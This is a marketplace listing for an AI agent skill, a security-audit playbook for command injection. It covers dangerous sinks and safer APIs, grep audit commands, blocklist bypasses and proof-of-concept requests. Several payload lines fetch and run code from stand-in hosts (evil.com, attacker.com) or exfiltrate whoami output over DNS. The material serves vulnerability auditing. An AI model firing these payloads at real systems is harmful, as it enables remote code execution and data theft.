Install
$ agentstack add skill-mingyiseclab-mingyi-atlas-command-injection-analysis Open-source listing, not yet scanned by AgentStack. Follow the source repository for install instructions.
Security review
⚠ Flagged2 finding(s); flagged for manual review. · v0.1.0 How review works →
- • Prompt-injection patterns
- • Secret / credential exfiltration
- • Dangerous shell & filesystem operations
- • Untrusted network calls
- • Known-malicious package signatures
- high Dangerous shell/eval execution.
- high Pipes remote content directly into a shell (remote code execution).
What it can access
- ● Network access Used
- ✓ Filesystem access No
- ● Shell / process execution Used
- ✓ Environment & secrets No
- ✓ Dynamic code execution No
From automated source analysis of v0.1.0. “Used” means the capability is present in the source — more access means more to trust, not that it’s unsafe.
Reliability & compatibility
Declared compatibility
Compatibility is declared by the source manifest. End-to-end runtime verification is coming, see below.
We're building live execution health for every listing: tool-call success rate, median latency, uptime, and last-checked timestamps, measured, not self-reported. It isn't live yet, so we don't show numbers we can't stand behind.
How agent discovery & health will work →About
Command Injection Playbook
If SQL injection is the king of web vulns, command injection is the king of DevOps vulns. Every image-processing upload, PDF generator, ffmpeg wrapper, and "run a script" feature is a candidate.
1. Sinks
| Language | Dangerous | Safer | |----------|------------------------------------------|----------------------------------------------------| | Python | os.system, subprocess.Popen(..., shell=True), os.popen, commands.getoutput | subprocess.run([...], shell=False) | | Node | child_process.exec, execSync | child_process.execFile, spawn (array args) | | Go | exec.Command("sh","-c",user) | exec.Command(bin, arg1, arg2) with array | | Java | Runtime.exec(String) | Runtime.exec(String[]), ProcessBuilder([...]) | | Ruby | backticks, system(str), %x{...} | Kernel.system(bin, *args), Open3.capture2e | | PHP | shell_exec, exec, system, backticks, passthru | escapeshellarg + explicit execve |
Even the "safer" APIs are exploitable if the binary path is user controlled (exec.Command(userBin, "--version")).
2. Non-obvious sinks
- Template engines rendering shell: Ansible playbooks, systemd unit
files, crontab strings
- Docker-compose / k8s manifests where
command:is built from user input - PDF libraries that shell out to
pdflatex,wkhtmltopdf,puppeteer - ImageMagick —
convert user.jpg out.pngwhereuser.jpgis
attacker-chosen (classic ImageTragick)
- ffmpeg
-iwith user-provided URL/file (SSRF + RCE combo) - Git clone with user-supplied URL (remote helper injection)
- SSH/Rsync wrappers building
ssh user@host "cmd"from templates - ZIP extractors passing archive path to
unzipbinary
3. Audit workflow
# Level 1: obvious sinks
grep -rE 'os\.system\(|subprocess.*shell\s*=\s*True|exec\s*\(' /workspace/src
grep -rE 'Runtime\.exec\(|ProcessBuilder\([^[]' /workspace/src
grep -rE 'child_process\.(exec|execSync)\(' /workspace/src
# Level 2: shell metacharacters in strings
grep -rE '"[^"]*\$\{[a-z]+\}.*(-[a-z]|[;|&])"' /workspace/src
# Level 3: template strings
grep -rE 'ffmpeg|pdflatex|wkhtmltopdf|convert|pandoc' /workspace/src
4. Bypasses
Even when developers "sanitize" via blocklists:
- Argument injection (the -oProxyCommand trick) — passing
-oProxyCommand=curl $(whoami).attacker.comto ssh-based sinks - Space replacement —
${IFS},{ls,-la}(brace expansion) - Backtick/dollar-paren —
$(id), `id` - Command substitution in filename —
$(curl evil.com/x.sh | sh).jpg - Unicode normalisation —
"(fullwidth) vs"bypass - Encoded newline —
%0Aturns single-command into multi-command - TarSlip —
tar xzf user.tgzwith--checkpoint-action=exec=... - Git —
git clone 'ssh://ext::sh -c whoami # foo'
5. PoC ideas
# Spare out-of-band tester — DNS exfil confirms silent RCE
curl "https://target.com/export?filename=; curl $(whoami).attacker.oob/"
# Blind, response-timing based
curl "https://target.com/export?filename=; sleep 7 #.pdf"
# Noisy but fastest confirmation
curl "https://target.com/export?filename=; id > /tmp/pwn #.pdf"
6. validate_finding contract
- success_patterns:
uid=\d+,root, attacker OOB callback hit,total 0 - negative_command: same URL, filename set to
report.pdf - negative_patterns:
200,accepted
7. Default CVSS
| Variant | Vector | Score | |----------------------------------|--------------------------------------------|-------| | Blind OOB RCE unauth | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | 9.8 | | Authenticated RCE (low priv) | AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H | 8.8 | | RCE with scope change (container escape) | AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H | 10.0 |
8. Chain promotion
Command injection rarely needs chaining — it's the final hop of most chains. Instead, use it to promote earlier nodes: add enables edges from SSRF / file upload / path traversal vulns that deliver the initial payload.
Source & license
This open-source skill is cataloged on AgentStack and links to its original source — we do not rehost the code.
- Author: MingyiSecLab
- Source: MingyiSecLab/Mingyi-Atlas
- License: Apache-2.0
Install and usage instructions live in the source repository linked above.
Reviews
No reviews yet, be the first.
Write a review
Versions
- v0.1.0 Imported from the upstream source.